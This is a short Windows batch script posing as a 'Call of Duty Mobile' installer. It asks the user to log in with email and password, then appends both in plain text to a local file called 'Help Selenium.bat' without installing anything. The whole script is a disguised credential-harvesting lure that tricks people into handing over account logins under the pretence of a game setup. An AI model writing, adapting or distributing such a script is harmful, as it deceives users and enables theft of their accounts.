TITLE CALL OF DUTY MOBILE  setup
ECHO OFF
COLOR f0
CLS
ECHO.
ECHO LOGIN TO START INSTALLING CALL OF DUTY MOBILE
ECHO.
ECHO Please enter your email:
SET/P MAIL=
ECHO.
ECHO Enter the password:
SET/P PSWD=
ECHO EMAIL = %MAIL%>>Help Selenium.bat
ECHO PASSWORD = %PSWD%>>Help Selenium.bat
CLS
TIMEOUT /T 3 >NUL
COLOR fc
ECHO.
